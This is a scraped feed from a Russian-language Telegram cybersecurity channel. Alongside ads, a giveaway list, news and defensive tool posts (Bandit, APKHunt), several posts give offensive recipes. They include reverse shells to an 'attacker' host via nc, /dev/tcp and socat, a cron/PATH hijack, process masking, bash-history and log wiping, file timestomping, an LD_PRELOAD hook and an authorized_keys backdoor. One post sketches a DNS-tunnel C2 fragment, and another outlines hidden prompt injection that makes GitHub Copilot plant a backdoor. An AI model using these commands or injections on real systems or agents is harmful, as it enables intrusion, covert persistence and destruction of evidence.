ZeroDay | Кибербезопасность
45K subscribers
555 photos
5 videos
8 files
729 links
Ваш учебник по кибербезопасности

Реклама - @bashmak_media

https://telega.in/c/cybersec_academy

РКН: https://vk.cc/cHYqeq
Download Telegram
Вебинар для всех, кто работает с персональными данными

🗓3 сентября, 12:00
📍Онлайн

Selectel проведет вебинар, где разберут:
- как компаниям определить уровень защищенности персональных данных,
- как реализовать и подтвердить меры защиты.

Мероприятие бесплатное. Посмотреть программу и зарегистрироваться можно по ссылке: https://slc.tl/whxl1

Чтобы не пропустить вебинар и узнавать о митапах, воркшопах и бесплатных курсах Selectel, подписывайтесь на @selectel_events

Реклама. АО «Селектел», ИНН 7810962785, ERID: 2VtzqwahbzJ
6👎1
ZeroDay | Кибербезопасность
🎁 Большой розыгрыш от Codeby X Zeroday Мы подготовили для вас кучу полезных призов по кибербезопасности, чтобы апнуть свои навыки! Что можно выиграть: 1) 15 месячных подписок на платформу hackerlab.pro 2) 5 книг «Искусственный интеллект глазами хакера»…
🎉 Результаты розыгрыша:

🏆 Победители:
1. Eugene (@jenigen)
2. $.7&& (@k0st0vk7)
3. Banana (@solncelunaoblako)
4. ㅤ
5. Dmitry (@Enk0d)
6. Sergey (@Ref1leqq)
7. Nodar (@x0ff_deus)
8. mikhail (@ownnickname)
9. -A (@id9912345)
10. ki.real (@iamTRC20)
11. Екатерина (@catkozh)
12. Zefir (@ivansamsia)
13. ΝᎬϴᎷᎪᏀᎬ (@neo_mage)
14. Мухит
15. Vladislav (@darkh4mster)
16. 朴贊郁 (@flokiauther)
17. mad_peleng (@mad_peleng)
18. ᅠ
19. Владислав (@Watatamin)
20. 🍃 (@haltdiekIappe)
21. Сергей (@lanikhinSergei)
22. Andrei (@a_vasiukou)
23. Nikita (@heliotropelovethesun)
24. kimawashi (@romant1ca_com)
25. S (@SNSN_2023)

✔️Проверить результаты
Please open Telegram to view this post
VIEW IN TELEGRAM
1😢18🎉10🔥42👎1
Тот, кто знал слишком много: история Хьё Минь Нго

👋 Приветствую в мире цифровой безопасности!

Расскажу об обычном парне из Вьетнама, который стал случайно владеть базой данных в 200 млн.

Первые шаги: подросток из маленького вьетнамского городка просто хотел обойти лимиты dial-up и сидеть в инете бесплатно. Кончилось всё, как обычно, долгом для семьи и ссылкой к дяде «на перевоспитание». Там он наткнулся на хакерский форум и понял, что впереди много всего интересного.

От баловства к деньгам: сначала были надписи «Pwned by Hieu.pc» на сайтах. Потом - кредитки и обналичка через онлайн-покер. Доходы теперь шли в тысячи долларов в день. Чтобы ускорить поток, он написал свой сканер SQL-инъекций и штамповал данные пачками.

Большая игра: однажды ему подсказали - кредитки слишком заметны, а персональные данные стоят куда дороже. Он смог получить доступ к базе из 200 млн записей через контракт с Court Ventures. На своём сайте продавал поиск всего за $1, при себестоимости $0,14. В лучшие месяцы доходил до $120 000.

Падение: в 2012 Court Ventures купила Experian, и слишком активный «частный детектив из Сингапура» привлёк внимание агентов. Его заманили в Гуам и арестовали. Обвинения тянули на 45 лет, но сделка с правосудием сократила срок до 13, из которых он отсидел 7.

Новая глава: после освобождения в 2020 он вернулся во Вьетнам уже другим человеком. Теперь помогает ловить киберпреступников, консультирует жертв мошенников и читает лекции.

ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
195🤔2🤣2
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.


Быстрый поиск SUID и возможностей root: Не ограничивайтесьfind / -perm -4000. Используйте getcap -r / 2>/dev/null — это покажет бинарники с Linux capabilities. Например:

/usr/bin/python3 = cap_setuid+ep


Ну вот, у тебя по факту вышел шелл с root-привилегиями без эксплойтов.

Подмена скриптов через PATH: Если есть доступ к конфигам или cron, проверьте абсолютные пути команд. Можно подменить PATH и добавить свои скрипты:

echo "/tmp" > /etc/cron.d/fakelist
echo -e '#!/bin/bash\nnc attacker 4444 -e /bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH


SSH через прокси для MITM: Когда цель доступна по SSH, а нужен MITM, удобно юзать ProxyCommand:

Host target
ProxyCommand ncat --proxy attacker_ip:1080 --proxy-type socks5 %h %p


ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
13❤‍🔥6👍3😁1💋1
39😁28🤣19👍2🤔2❤‍🔥1
OFFZONE 2025: ключевые инсайты о трансформации киберугроз

21–22 августа в Москве прошла шестая конференция по практической кибербезопасности OFFZONE 2025, собравшая более 2500 специалистов. В программе — 98 докладов и обсуждения ключевых вызовов для отрасли.

Среди тем:

— уязвимости в парсерах и пентест Wi-Fi;
— применение AI и ML в кибербезопасности;
— багбаунти, Web3, OSINT и построение защищённых цифровых экосистем.

Наибольшее внимание привлекло исследование "Threat Zone 2025: обратная сторона", результаты которого представила компания BI.ZONE. Эксперты проанализировали более 5000 сообщений с теневых форумов и каналов:

— 20% атакующих группировок используют коммерческое ВПО;
— стоимость корпоративных аккаунтов на черном рынке стартует от $10;
— стилеры остаются самым популярным видом коммерческого ВПО.

Конференцию открыл Евгений Касперский докладом о кибериммунитете для цифровой эры, а всего своими инсайтами поделились более 120 экспертов.

Атмосфера была не менее яркой: квесты, квизы в телеграм-боте, HACK in 15 min, Craft.Zone, кастомные бейджи и даже Tattoo.Zone, где 21 участник набил логотип OFFZONE и получил пожизненную проходку на все будущие конференции.

ZeroDay | #безопасность
13🔥10👍4👾2
📝 Какие файрволы бывают?

ZeroDay | #firewall
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍8💩6🍌1
Охотимся на Copilot 😏 Учебная промпт-инъекция для пентестеров

GitHub Copilot умеет автоматически писать код по задачам. Казалось бы, удобно и безопасно. Но если задача публичная и её назначают Copilot, появляется скрытый вектор атаки: промпт-инъекция. Текст задачи может незаметно подсунуть инструкции, из-за которых агент добавит «нычку» в репозиторий.

В статье поясняют, как устроена такая промпт-инъекция: как спрятать вредоносный текст от глаза мейнтейнера, как Copilot воспринимает контекст, и как формируются прям надежные эксплойты с низким риском обнаружения.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14❤‍🔥4👍2
APKHunt: анализ Android-приложений

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

APKHunt - статический анализатор APK, заточенный под стандарты OWASP MASVS. Он сканирует безопасность хранения данных, работу с криптографией, использование разрешений и даже наличие отладочных функций.

Что классного: умеет сканировать сразу несколько APK, формирует лёгкие TXT-отчёты и поддерживает CI/CD-интеграцию. Так что его можно встроить прямо в пайплайн, чтобы каждый билд проходил проверку на автомате.

Кому пригодится: ну разрабам - чтобы не выпускать дырявые релизы, пентестерам, конечно - для ускорения аудита, а архитекторам - для контроля соблюдения стандартов безопасности.

Как потестить самому:

git clone https://github.com/Cyber-Buddy/APKHunt.git
cd APKHunt
go run apkhunt.go -p app.apk -l


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍85🔥1😁1🤩1
This media is not supported in your browser
VIEW IN TELEGRAM
IoT и DNS-туннели: как закрепляются атакующие

👋 Приветствую в мире цифровой безопасности!

Сегодня посмотрим, как хакеры юзают IoT-устройства для входа в сеть и закрепляются через DNS-туннели.

Как ломают:
1️⃣Сначала ищут потенциальные цели через открытые источники (ripe.net, passive DNS) и сканят сеть с помощью masscan или Angry IP Scanner.
2️⃣Находят уязвимый роутер, L3-коммутатор или камеру и запускают routersploit autopwn - перебор эксплойтов и брутфорс.
3️⃣Дальше небольшой трюк: скомпрометированное устройство тянет пейлоад с VPS через встроенный wget и запускает его. Архитектуры любые: ARM, x86, MIPS и т.д.
4️⃣Готово - IoT превращается в точку входа внутрь сети, через которую можно прокинуть SOCKS proxy и атаковать уже корпоративный сегмент.

В чем плюсы: на IoT нет антивирусов и EDR, системные вызовы никто не мониторит, логи не собирают. А значит, команда exec проходит беспрепятственно.

Где появляется DNS-туннелирование: даже если сеть сегментирована и фильтруется, малварь может «стучаться» на C2-панель через Do53/DoT/DoH, пряча команды в битах DNS-заголовков. Да, ответ на условный ls может идти сутки, но для хакера то главное - это закрепление в сети.

Пример из PoC:

unsigned short __do53_query(char *_qname, __do53_type _qtype, unsigned char *_wire)
{
_wire[0] = // Вот здесь пейлоад
_wire[1] = // Вот здесь пейлоад
_wire[2] = 0x01;
_wire[3] = 0x00;
_wire[4] = 0x00;
_wire[5] = 0x01;
_wire[6] = 0x00;
_wire[7] = 0x00;
_wire[8] = 0x00;
_wire[9] = 0x00;
_wire[10] = 0x00;
_wire[11] = 0x00;

int query_lenght = __ascii_convertation_to_wire(_qname, &(_wire[12]));
int nextLoc = 12 + query_lenght + 1;

_wire[nextLoc] = 0x00;
_wire[++nextLoc] = 0x01;
_wire[++nextLoc] = 0x00;
_wire[++nextLoc] = 0x01;

return nextLoc + 1;
}


В итоге у нас подломленное устройство раз в час резолвит «невинный» домен вроде metrics-cisco.com и получает команды в Additional-/Authority-секциях. Для NTA-систем это выглядит просто как обычный DNS-запрос.

ZeroDay | #IoT
Please open Telegram to view this post
VIEW IN TELEGRAM
15👍95😱3❤‍🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
Шифруем скрипты

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как шифровать скрипты.

Очень часто заказчики получают готовый продукт, но хотят защитить исходный код bash или Python-скриптов. Простая компиляция не помогает.

Как решить: Obash - это обфускатор и шифратор скриптов, который превращает их в исполняемые бинарники с AES-256 шифрованием и аппаратной привязкой.

Ключ и вектор инициализации берутся с железа, а не хардкодятся в бинарнике, что делает невозможным запуск скрипта на чужой машине. Даже если кто-то получит бинарь и посмотрит память или процессы, исходники не увидит.

Как его использовать:

git clone https://github.com/louigi600/obash.git
cd obash/
sudo apt install libssl-dev
make
./obash testme


Привязка к железу: для работы шифрования Obash берёт UUID и Serial устройства. Если рут-доступа нет, можно сделать локальные файлы:

sudo cat /sys/devices/virtual/dmi/id/product_uuid > product_uuid
sudo cat /sys/devices/virtual/dmi/id/product_serial > product_serial


И заменить пути в interpreter.c и obfuscated_bash.c:

char prod_uuid[256]="./product_uuid";
char prod_serial[256]="./product_serial";


Что происходит внутри: Obash шифрует скрипт AES-256, кодирует его в Base64, создаёт промежуточный C-файл (interpreter.c) с функциями интерпретации и компилирует бинарник. Сюда входят и ключи, и вектор, и шифротекст. Бинарник запускается только на целевой машине.

Вот пример тестового скрипта:

#!/bin/bash
echo "my pid is: $$"
echo $0
echo $*
read -p "enter something ... " A
echo $A
sleep 10 &
ps -ef | grep $$
ps -ef | grep $!
sleep 2


В следующем посте будем анализировать шифрованные скрипты

ZeroDay | #скрипты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍193❤‍🔥2💩1💘1
Анализируем шифрованные скрипты

👋 Приветствую в мире цифровой безопасности!

Продолжим говорить о шифровании скриптов, сегодня же будем их анализировать.

Создадим шифрованный скрипт:

./obash testme -o testme.x


Он работает пока рядом есть файлы product_serial и product_uuid. Удалим их, и запуск невозможен: именно они содержат данные для дешифрации.

Попробуем заглянуть внутрь. Если открыть testme.x в редакторе:

mcedit testme.x


Видим блок Base64 с зашифрованным текстом и строки, явно указывающие на исходники Obash.

Дальше смотрим, какие библиотеки он тянет:

ldd ./testme.x


Среди зависимостей - libcrypto.so, что подтверждает использование AES.

Теперь глянем системные вызовы:

strace -o log ./testme.x


В логе видно, как программа считывает UUID и Serial, а в конце пишет во временный FIFO-файл /tmp/<PID> полный текст скрипта (175 байт, ровно как исходник). После чтения файл удаляется, но содержимое мы уже перехватили.

Автоматизируем. Сделаем подменный интерпретатор:

gcc fake_interpreter.c -o bash
gcc fake_interpreter.c -o python


Запускаем с подменой:

PATH=.:$PATH ./testme.x


В результате скрипт выводится целиком - никакого шифрования уже нет.

ZeroDay | #скрипты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍144❤‍🔥2
Ваш антивирус смотрит за тем, как вы отключаете его, чтобы запустить keygen.exe

ZeroDay | #мем
😁62🤣329👏1💘1
Корреляция без SIEM: универсальный движок в действии

Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.

В статье показывают 7 примеров, где такой механизм реально работает: скоринг пользователей в UEBA, макрокорреляции для SOC, прогнозирование рисков в SGRC и даже контроль в АСУ ТП. Один и тот же инструмент, но для разного.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍2❤‍🔥1💘1
Bandit: быстрый поиск уязвимостей в Python-коде

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Bandit — классная утилита для поиска уязвимостей в Python-коде.
Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.

Python сегодня, очевидно, один из самых популярных языков, а значит и уязвимости в коде на нём часто становятся точкой входа для атак. Bandit может ловить проблемы ещё на этапе разработки или CI/CD. Утилита легко встраивается в пайплайн (pre-commit hooks, GitHub Actions, GitLab CI и пр.) и формирует отчёты в разных форматах — от JSON до HTML.

Быстрый старт:
Установка через pip:

pip install bandit


Проверка всего проекта:

bandit -r ./my_project


Или проверка конкретного файла:

bandit my_script.py


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤‍🔥43
This media is not supported in your browser
VIEW IN TELEGRAM
5 фишек Bash для скрытности

👋 Приветствую в мире цифровой безопасности!

Давай расскажу о 5 фишках Bash для того, чтобы работать тише.


Подделка времени файлов: Чтобы файл не выделялся среди новых, можно «состарить» его:

touch -r /bin/ls hack.sh
touch -t 201801010101.01 hack.sh


Так скрипт выглядит как старый системный.

Маскировка процессов: В ps любой увидит ваш процесс. Но можно «притвориться»:

exec -a "[kworker/0:1H]" ./evil.sh
echo "httpd" > /proc/$$/comm


Теперь скрипт похож на системный или веб-сервер.

Работа без истории: Чтобы команды не остались в ~/.bash_history:

HISTFILE=/dev/null
set +o history
history -c && history -w


Алиасы для скрытности: Подменяем стандартные команды:

alias ls='ls --hide=hack.sh'
alias vanish='rm -rf ~/.bash_history /var/log/*'


Первое прячет файлы, второе - убирает следы.

Скрытый сетевой трафик: Обратный шелл можно завуалировать под HTTPS:

bash -i >& /dev/tcp/attacker/443 0>&1


Трафик пойдёт через порт 443, что выглядит в принципе привычно.

ZeroDay | #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥226😱2😁1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.


LD_PRELOAD для подмены системных вызовов: Если у вас есть возможность писать в /tmp, можно внедрить свою библиотеку. Например, перехватить вызов open() и переправить его в свой файл. Создаём evil.c:

#include <stdio.h>
#include <dlfcn.h>
#include <fcntl.h>

int open(const char *path, int flags, ...) {
static int (*orig_open)(const char*, int, ...) = NULL;
if (!orig_open) orig_open = dlsym(RTLD_NEXT, "open");
if (strstr(path, "shadow")) return orig_open("/etc/passwd", flags);
return orig_open(path, flags);
}


➡️ Собираем: gcc -fPIC -shared -o evil.so evil.c -ldl
➡️ Запускаем: LD_PRELOAD=./evil.so target_binary

SSH-ключи без пароля: Многие забывают, что authorized_keys поддерживает опции. Можно добавить туда ключ с хитрым префиксом:

command="/bin/bash -i" ssh-rsa AAAAB3...


Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».

Socat как универсальный биндер: Иногда на цели нет nc, а нужен обратный шелл или проброс. Socat поможет тут:

socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash


Или проброс порта с шифрованием:

socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:localhost:22


ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍134